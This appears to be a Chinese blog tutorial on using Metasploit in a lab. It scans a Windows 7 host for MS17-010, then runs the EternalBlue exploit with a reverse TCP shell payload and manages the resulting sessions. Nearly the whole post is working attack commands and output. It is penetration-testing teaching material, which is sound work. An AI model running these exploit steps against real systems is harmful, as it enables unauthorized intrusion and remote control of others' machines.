metasploit渗透测试

使用msf渗透Win7主机,并远程执行命令

整体流程

已知漏洞→查找模块→配置程序→执行exploit

查找模块:

1
2
3
4
search MS17-...
show exploits
show payloads
show auxiliary

配置程序:

1
2
3
4
5
6
7
8
9
10
11
显示参数:
show options
show targets
show encoders
show advanced
info xxx
----------
设置参数:
use xxx(exploit)
set xxx(payload)
set xxx xxx(参数)

执行exploit:

1
2
exploit(命令)
run(命令)

任务开始

查找该漏洞的扫描模块

1
2
3
msf5 > search ms17-010
------
auxiliary/scanner/smb/smb_ms17_010 (这是一个扫描模块)

 

 

 

 加载模块

1
2
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >

查看设置哪些参数

1
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

设置目标HOSTS

1
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.255.150

查看设置的HOSTS

1
2
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS       192.168.255.150

执行攻击命令开始扫描该主机

1
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

查找该漏洞的攻击模块

1
2
3
msf5 > search ms17-010
---------
exploit/windows/smb/ms17_010_eternalblue (永恒之蓝)

 

 

 加载该模块

1
2
3
msf5 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >

检查要设置的参数

1
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

 

 设置靶机的HOSTS

1
2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.255.150
RHOSTS => 192.168.255.150

查看可以复现的系统

1
2
3
4
5
6
7
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
 
Exploit targets:
 
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

使用攻击载荷(payload)设置本地监听

1
2
3
msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/shell
--------
payload/windows/shell/reverse_tcp

设置攻击载荷(payload)

1
2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

显示设置的参数

 

 

设置本地端口和IP

1
2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.255.200 LPORT 4444
LHOST => 192.168.255.200 LPORT 4444

 

 执行攻击命令

1
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

 

 

拿到shell后解决乱码问题

1
C:\Windwos\system32> chcp 65001

Ctrl+C断开连接

渗透成功之后将会话保存到后台

1
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

  

 

 查看保存到后台的会话

1
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

启用这个会话

session -i [会话ID]

1
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2

进入会话后想返回而不丢失这个会话,[返回并保持到后台]

1
2
C:\Windows\system32>background
Background session 2? [y/N] y

清理这个会话

1
2
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
[*] Killing the following session(s): 2

 

show options参数列表说明

参数解释
Name 参数名称
Current Setting 默认值
Required 是否必须设置
Description 参数的描述

总结使用metasploit攻击的步骤

  • 1、查找CVE公布的漏洞

  • 2、查找对应的exploit模块

  • 3、配置模块参数

  • 4、添加payload后门

  • 5、执行exploit开始攻击

posted @   MineLSG  阅读(640)  评论(0编辑  收藏  举报
编辑推荐:
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
点击右上角即可分享
微信分享提示